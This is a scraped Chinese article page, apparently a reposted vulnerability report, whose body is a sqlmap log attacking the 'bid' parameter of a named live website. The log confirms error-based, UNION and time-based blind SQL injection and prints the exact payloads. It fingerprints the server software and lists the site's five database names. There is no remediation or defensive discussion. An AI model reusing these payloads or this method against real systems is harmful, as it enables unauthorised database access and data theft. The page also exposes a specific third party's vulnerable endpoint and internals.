视频1 视频21 视频41 视频61 视频文章1 视频文章21 视频文章41 视频文章61 推荐1 推荐3 推荐5 推荐7 推荐9 推荐11 推荐13 推荐15 推荐17 推荐19 推荐21 推荐23 推荐25 推荐27 推荐29 推荐31 推荐33 推荐35 推荐37 推荐39 推荐41 推荐43 推荐45 推荐47 推荐49 关键词1 关键词101 关键词201 关键词301 关键词401 关键词501 关键词601 关键词701 关键词801 关键词901 关键词1001 关键词1101 关键词1201 关键词1301 关键词1401 关键词1501 关键词1601 关键词1701 关键词1801 关键词1901 视频扩展1 视频扩展6 视频扩展11 视频扩展16 文章1 文章201 文章401 文章601 文章801 文章1001 资讯1 资讯501 资讯1001 资讯1501 标签1 标签501 标签1001 关键词1 关键词501 关键词1001 关键词1501 专题2001
我拉网主站一处sql注入_MySQL
2020-11-09 19:20:30 责编:小采
文档
点击下载本文 文档为doc格式


我拉网主站一处sql注入

注入点

http://www.55.la/run/ding_banner.php?bid=21022
注入地址:http://www.55.la/run/ding_banner.php?bid=21022
	sqlmap/1.0-dev - automatic SQL injection and database takeover tool
	http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 02:04:07
[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化
版/rar/output/www.55.la/session' as session file
[02:04:07] [INFO] testing connection to the target url
[02:04:07] [INFO] testing if the url is stable, wait a few seconds
[02:04:08] [INFO] url is stable
[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic
[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic
[02:04:09] [INFO] GET parameter 'bid' is dynamic
[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta
ble (possible DBMS: MySQL)
[02:04:09] [INFO] testing sql injection on GET parameter 'bid'
[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i
njectable
[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns
[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col
umns' injectable
GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 32 HTTP(s) requ
ests:
---
Place: GET
Parameter: bid
	Type: error-based
	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
	Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3
a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe
	Type: UNION query
	Title: MySQL UNION query (NULL) - 1 column
	Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e42615053745265,
0x3a7862753a)# AND 'EXgA'='EXgA
	Type: AND/OR time-based blind
	Title: MySQL > 5.0.11 AND time-based blind
	Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros
---
[02:04:27] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.24
back-end DBMS: MySQL 5.0
[02:04:27] [INFO] fetching database names
[02:04:30] [INFO] the SQL query used returns 5 entries
[02:04:30] [INFO] retrieved: "information_schema"
[02:04:37] [INFO] retrieved: "help55la"
[02:04:37] [INFO] retrieved: "test"
[02:04:37] [INFO] retrieved: "u_run55_la"
[02:04:37] [INFO] retrieved: "wstp8_com"
available databases [5]:
[*] help55la
[*] information_schema
[*] test
[*] u_run55_la
[*] wstp8_com
[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato
r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'
[*] shutting down at 02:04:37

下载本文
显示全文
专题
动视 51dongshi.net 版权所有
Copyright © 2019-2025